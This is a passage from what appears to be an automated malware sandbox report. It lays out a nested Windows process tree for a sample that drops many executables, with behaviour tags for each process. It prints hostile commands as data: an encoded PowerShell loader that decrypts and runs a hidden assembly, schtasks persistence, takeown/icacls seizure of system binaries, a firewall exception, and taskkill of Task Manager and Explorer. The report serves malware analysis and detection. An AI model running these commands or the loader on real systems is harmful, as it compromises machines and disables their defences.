                                                                                      20⤵
                                                                                        PID:3832
                                                                                      • C:\Windows\system32\PING.EXE
                                                                                        ping -n 10 localhost
                                                                                        20⤵
                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                        • Runs ping.exe
                                                                                        PID:3348
                                                                                      • C:\Program Files\SubDir\Romilyaa.exe
                                                                                        "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                        20⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        • Suspicious use of SendNotifyMessage
                                                                                        PID:3196
                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                          "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                          21⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:4056
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\hBf5YrKVrr8F.bat" "
                                                                                          21⤵
                                                                                            PID:2896
                                                                                            • C:\Windows\system32\chcp.com
                                                                                              chcp 65001
                                                                                              22⤵
                                                                                                PID:3672
                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                ping -n 10 localhost
                                                                                                22⤵
                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                • Runs ping.exe
                                                                                                PID:400
                                                                                              • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                22⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                PID:2064
                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                  "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                  23⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:1740
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\W4XuVn9ZFNK8.bat" "
                                                                                                  23⤵
                                                                                                    PID:3524
                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                      chcp 65001
                                                                                                      24⤵
                                                                                                        PID:904
                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                        ping -n 10 localhost
                                                                                                        24⤵
                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                        • Runs ping.exe
                                                                                                        PID:3488
                                                                                                      • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                        "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                        24⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        PID:1104
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                          25⤵
                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                          PID:2052
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\LLpLRuJU60o4.bat" "
                                                                                                          25⤵
                                                                                                            PID:2820
                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                              chcp 65001
                                                                                                              26⤵
                                                                                                                PID:2972
                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                ping -n 10 localhost
                                                                                                                26⤵
                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                • Runs ping.exe
                                                                                                                PID:940
                                                                • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\the.exe
                                                                  the.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:2744
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                                                    4⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2828
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im taskmgr.exe
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2236
                                                                • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\wimloader.dll
                                                                  wimloader.dll
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:584
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_c3e8deeb-cdbc-4e7d-bb33-e403c7075a52\caller.cmd" "
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2400
                                                                • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\ac3.exe
                                                                  ac3.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                  PID:3276
                                                                • C:\Windows\SysWOW64\notepad.exe
                                                                  "C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\shell1.ps1"
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2912
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping trustsentry.com -t -n 1 -s 4 -4
                                                                  3⤵
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  • Runs ping.exe
                                                                  PID:2688
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping ya.ru -t -n 1 -s 4 -4
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  • Runs ping.exe
                                                                  PID:3844
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping tria.ge -t -n 1 -s 4 -4
                                                                  3⤵
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  • Runs ping.exe
                                                                  PID:1776
                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                  xcopy bloatware C:\Users\Admin\Desktop
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Enumerates system info in registry
                                                                  PID:924
                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                  xcopy beastify.url C:\Users\Admin\Desktop
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Enumerates system info in registry
                                                                  PID:2072
                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                  xcopy shell1.ps1 C:\Users\Admin\Desktop
                                                                  3⤵
                                                                  • Enumerates system info in registry
                                                                  PID:2076
                                                                • C:\Windows\SysWOW64\takeown.exe
                                                                  takeown /R /F C:\Windows\explorer.exe
                                                                  3⤵
                                                                  • Possible privilege escalation attempt
                                                                  • Modifies file permissions
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3456
                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                  icacls c:\Windows\explorer.exe /grant Admin:(F)
                                                                  3⤵
                                                                  • Possible privilege escalation attempt
                                                                  • Modifies file permissions
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2056
                                                                • C:\Windows\SysWOW64\takeown.exe
                                                                  takeown /R /F C:\Windows\System32\dwm.exe
                                                                  3⤵
                                                                  • Possible privilege escalation attempt
                                                                  • Modifies file permissions
                                                                  PID:3832
                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                  icacls c:\Windows\System32\dwm.exe /grant Admin:(F)
                                                                  3⤵
                                                                  • Possible privilege escalation attempt
                                                                  • Modifies file permissions
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:4048
                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                  xcopy xcer.cer C:\Users\Admin\Desktop
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Enumerates system info in registry
                                                                  PID:1800
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /t 15
                                                                  3⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:988
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /t 15
                                                                  3⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:3524
                                                                • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\freebobux.exe
                                                                  freebobux.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1736
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\7465.tmp\freebobux.bat""
                                                                    4⤵
                                                                    • Loads dropped DLL
                                                                    PID:1716
                                                                    • C:\Users\Admin\AppData\Local\Temp\7465.tmp\CLWCP.exe
                                                                      clwcp c:\temp\bg.bmp
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Sets desktop wallpaper using registry
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:932
                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7465.tmp\x.vbs"
                                                                      5⤵
                                                                        PID:3748
                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\SolaraBootstraper.exe
                                                                    SolaraBootstraper.exe
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:2568
                                                                    • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:3640
                                                                    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:2236
                                                                    • C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"
                                                                      4⤵
                                                                      • Drops startup file
                                                                      • Executes dropped EXE
                                                                      • Adds Run key to start application
                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                      PID:1856
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE
                                                                        5⤵
                                                                        • Modifies Windows Firewall
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2600
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im ctfmon.exe
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Kills process with taskkill
                                                                    PID:1516
                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\wim.dll
                                                                    wim.dll
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2596
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\wim_dfa8629f-ee0a-403e-9e00-692145d56147\load.cmd" "
                                                                      4⤵
                                                                        PID:2556
                                                                        • C:\Program Files\VideoLAN\VLC\vlc.exe
                                                                          "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_dfa8629f-ee0a-403e-9e00-692145d56147\cringe.mp4"
                                                                          5⤵
                                                                          • Suspicious behavior: AddClipboardFormatListener
                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:2656
                                                                        • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_dfa8629f-ee0a-403e-9e00-692145d56147\lol.ini
                                                                          5⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2932
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_dfa8629f-ee0a-403e-9e00-692145d56147\mailgooglecom.json
                                                                          5⤵
                                                                          • Modifies registry class
                                                                          PID:3328
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_dfa8629f-ee0a-403e-9e00-692145d56147\CLOCK.py
                                                                          5⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Modifies registry class
                                                                          PID:684
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      "C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\xcer.cer
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Modifies system certificate store
                                                                      PID:1104
                                                                    • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\f3cb220f1aaa32ca310586e5f62dcab1.exe
                                                                      f3cb220f1aaa32ca310586e5f62dcab1.exe
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:2588
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /t 15
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Delays execution with timeout.exe
                                                                      PID:1608
                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                      xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Enumerates system info in registry
                                                                      PID:2176
                                                                    • C:\Windows\SysWOW64\regedit.exe
                                                                      regedit
                                                                      3⤵
                                                                      • Runs regedit.exe
                                                                      PID:2832
                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                      xcopy C:\Windows\WinSxS C:\Users\Admin\Desktop
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Enumerates system info in registry
                                                                      PID:3812
                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                      xcopy regmess.exe C:\Users\Admin\Desktop
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Enumerates system info in registry
                                                                      PID:2300
                                                                    • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\jaffa.exe
                                                                      jaffa.exe
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Drops file in System32 directory
                                                                      • Drops file in Windows directory
                                                                      • Modifies registry class
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:2052
                                                                      • C:\Windows\SysWOW64\dxwbwewlne.exe
                                                                        dxwbwewlne.exe
                                                                        4⤵
                                                                        • Modifies visibility of file extensions in Explorer
                                                                        • Modifies visiblity of hidden/system files in Explorer
                                                                        • Windows security bypass
                                                                        • Disables RegEdit via registry modification
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Windows security modification
                                                                        • Enumerates connected drives
                                                                        • Modifies WinLogon
                                                                        • Drops file in System32 directory
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Modifies registry class
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:3480
                                                                        • C:\Windows\SysWOW64\zyrnalmo.exe
                                                                          C:\Windows\system32\zyrnalmo.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Enumerates connected drives
                                                                          • Drops file in Program Files directory
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:1376
                                                                      • C:\Windows\SysWOW64\eususxtzrybfydh.exe
                                                                        eususxtzrybfydh.exe
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Adds Run key to start application
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:1872
                                                                      • C:\Windows\SysWOW64\zyrnalmo.exe
                                                                        zyrnalmo.exe
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Enumerates connected drives
                                                                        • Drops file in Program Files directory
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:3708
                                                                      • C:\Windows\SysWOW64\yjpiisywuzrev.exe
                                                                        yjpiisywuzrev.exe
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:3332
                                                                      • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
                                                                        "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Windows\mydoc.rtf"
                                                                        4⤵
                                                                        • Drops file in Windows directory
                                                                        • Suspicious behavior: AddClipboardFormatListener
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:1192
                                                                        • C:\Windows\splwow64.exe
                                                                          C:\Windows\splwow64.exe 12288
                                                                          5⤵
                                                                            PID:3076
                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\helper.vbs"
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2456
                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\jkka.exe
                                                                        jkka.exe
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:1908
                                                                        • C:\Windows\SysWOW64\notepad.exe
                                                                          "C:\Windows\system32\notepad.exe"
                                                                          4⤵
                                                                          • Drops startup file
                                                                          • Loads dropped DLL
                                                                          • NTFS ADS
                                                                          PID:832
                                                                          • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                            "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:988
                                                                            • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                              "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"
                                                                              6⤵
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              • Accesses Microsoft Outlook profiles
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              • outlook_office_path
                                                                              • outlook_win_path
                                                                              PID:3636
                                                                            • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                              "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe" 2 3636 259598315
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1040
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /f /im fontdrvhost.exe
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Kills process with taskkill
                                                                        PID:1864
                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\selfaware.exe
                                                                        selfaware.exe
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Suspicious use of SetThreadContext
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1608
                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\selfaware.exe
                                                                          selfaware.exe
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Adds Run key to start application
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3304
                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                            icacls "C:\Users\Admin\AppData\Local\e542afb4-8aea-487a-8254-0c50560ecd16" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                            5⤵
                                                                            • Possible privilege escalation attempt
                                                                            • Modifies file permissions
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:1820
                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\selfaware.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\selfaware.exe" --Admin IsNotAutoStart IsNotTask
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:292
                                                                            • C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\selfaware.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\selfaware.exe" --Admin IsNotAutoStart IsNotTask
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:1340
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /f /im explorer.exe
                                                                        3⤵
                                                                        • Kills process with taskkill
                                                                        PID:3844
                                                                    • C:\Users\Admin\AppData\Local\Temp\12f124b4-5900-43f7-b026-35899fa2ab53\packer.exe
